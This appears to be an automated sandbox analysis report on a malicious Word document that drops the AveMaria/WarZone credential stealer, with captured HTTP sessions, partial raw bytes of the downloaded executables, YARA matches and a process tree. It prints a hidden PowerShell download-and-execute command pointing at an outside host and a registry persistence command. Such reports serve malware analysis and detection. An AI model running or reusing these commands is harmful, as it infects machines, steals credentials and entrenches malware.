                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELFaP z; @@ @(;O@` H.text` `.rsrc@"@@.reloc`(@B\;H w0(+(,(o-*(.(/(0(1(2*N(o(3*&(4*s5s6s7s8s9*0~o:+*0~o;+*0~o<+*0~o=+*0~o>+*0<~(?,!rp(@oAsB~+*0~+*"*0&(r?p~oC(Dt%+*s(Ets


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.2249167203.159.80.18680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampkBytes transferredDirectionData
                                Aug 2, 2021 10:59:58.669049025 CEST1537OUTGET /putty.exe HTTP/1.1
                                Host: newhosteeeee.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 10:59:58.711807013 CEST1538INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Sun, 01 Aug 2021 22:25:10 GMT
                                Accept-Ranges: bytes
                                ETag: "6ca734172487d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 08:59:57 GMT
                                Content-Length: 731648
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3f 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 40 00 00 0a 6f 41 00 00 0a 73 42 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 43 00 00 0a 28 44 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 45 00 00 0a 74 06 00 00 02 80 08 00 00 04 73
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELFaP z; @@ @(;O@` H.text` `.rsrc@"@@.reloc`(@B\;H w0(+(,(o-*(.(/(0(1(2*N(o(3*&(4*s5s6s7s8s9*0~o:+*0~o;+*0~o<+*0~o=+*0~o>+*0<~(?,!rp(@oAsB~+*0~+*"*0&(r?p~oC(Dt%+*s(Ets


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                3192.168.2.2249169203.159.80.16580C:\ProgramData\images.exe
                                TimestampkBytes transferredDirectionData
                                Aug 2, 2021 11:00:29.636285067 CEST2381OUTGET /microC.exe HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: hutyrtit.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 11:00:29.667159081 CEST2383INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Mon, 02 Aug 2021 07:13:53 GMT
                                Accept-Ranges: bytes
                                ETag: "382415f36d87d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 09:00:29 GMT
                                Content-Length: 1378816
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 31 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 37 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 45 00 00 70 7e 07 00 00 04 6f 2d 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL1aP.L `@ `@KO` @ H.text, . `.rsrc `0@@.reloc@@BKH0dso(*&(*ss s!s"s#*0~o$+*0~o%+*0~o&+*0~o'+*0~o(+*0<~(),!rp(*o+s,~+*0~+*"*0&(r1p~o-(.t$+*0&(r7p~o-(.t$+*0&(r?p~o-(.t$+*0&(rEp~o-


                                Code Manipulations

                                Statistics

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: WINWORD.EXE PID: 2604 Parent PID: 584

                                General

                                Start time:10:59:37
                                Start date:02/08/2021
                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Wow64 process (32bit):false
                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                Imagebase:0x13f7d0000
                                File size:1424032 bytes
                                MD5 hash:95C38D04597050285A18F66039EDB456
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Analysis Process: powershell.exe PID: 2396 Parent PID: 2604

                                General

                                Start time:10:59:40
                                Start date:02/08/2021
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
                                Imagebase:0x13f100000
                                File size:473600 bytes
                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.2094462607.0000000000160000.00000004.00000020.sdmp, Author: Florian Roth
                                Reputation:high

                                Analysis Process: FLTLDR.EXE PID: 3048 Parent PID: 2604

                                General

                                Start time:10:59:40
                                Start date:02/08/2021
                                Path:C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE
                                Wow64 process (32bit):false
                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
                                Imagebase:0x13f870000
                                File size:157024 bytes
                                MD5 hash:AF5CCD95BAC7ADADD56DE185D7461B2C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Analysis Process: powershell.exe PID: 1068 Parent PID: 2604

                                General

                                Start time:10:59:41
                                Start date:02/08/2021
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
                                Imagebase:0x13f100000
                                File size:473600 bytes
                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.2096261364.00000000002C0000.00000004.00000020.sdmp, Author: Florian Roth
                                Reputation:high

                                Analysis Process: powershell.exe PID: 3056 Parent PID: 2604

                                General

                                Start time:10:59:41
                                Start date:02/08/2021
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
                                Imagebase:0x13f100000
                                File size:473600 bytes
                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:high

                                Analysis Process: putty.exe PID: 2952 Parent PID: 1068

                                General

                                Start time:10:59:44
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\AppData\Roaming\putty.exe'
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 28%, ReversingLabs
                                Reputation:low

                                Analysis Process: putty.exe PID: 2948 Parent PID: 3056

                                General

                                Start time:10:59:44
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\AppData\Roaming\putty.exe'
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Analysis Process: putty.exe PID: 1492 Parent PID: 2948

                                General

                                Start time:10:59:51
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Analysis Process: putty.exe PID: 2308 Parent PID: 2952

                                General

                                Start time:10:59:52
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: AveMaria_WarZone, Description: unknown, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Analysis Process: putty.exe PID: 2260 Parent PID: 2948

                                General

                                Start time:10:59:52
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Analysis Process: putty.exe PID: 2428 Parent PID: 2948

                                General

                                Start time:10:59:54
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: AveMaria_WarZone, Description: unknown, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                Reputation:low

                                Analysis Process: cmd.exe PID: 2156 Parent PID: 2308

                                General

                                Start time:10:59:56
                                Start date:02/08/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
                                Imagebase:0x49d30000
                                File size:302592 bytes
                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Analysis Process: images.exe PID: 2168 Parent PID: 2308

                                General

                                Start time:10:59:56
                                Start date:02/08/2021
                                Path:C:\ProgramData\images.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\images.exe
                                Imagebase:0x1180000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 28%, ReversingLabs

                                Analysis Process: reg.exe PID: 2400 Parent PID: 2156

                                General

                                Start time:10:59:57
                                Start date:02/08/2021
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
                                Imagebase:0xb50000
                                File size:62464 bytes
                                MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Analysis Process: verclsid.exe PID: 1900 Parent PID: 2604

                                General

                                Start time:11:00:00
                                Start date:02/08/2021
                                Path:C:\Windows\System32\verclsid.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                Imagebase:0xff8f0000
                                File size:11776 bytes
                                MD5 hash:3796AE13F680D9239210513EDA590E86
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Analysis Process: images.exe PID: 2820 Parent PID: 2168

                                General

                                Start time:11:00:02
                                Start date:02/08/2021
                                Path:C:\ProgramData\images.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\images.exe
                                Imagebase:0x1180000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: AveMaria_WarZone, Description: unknown, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, Author: Joe Security
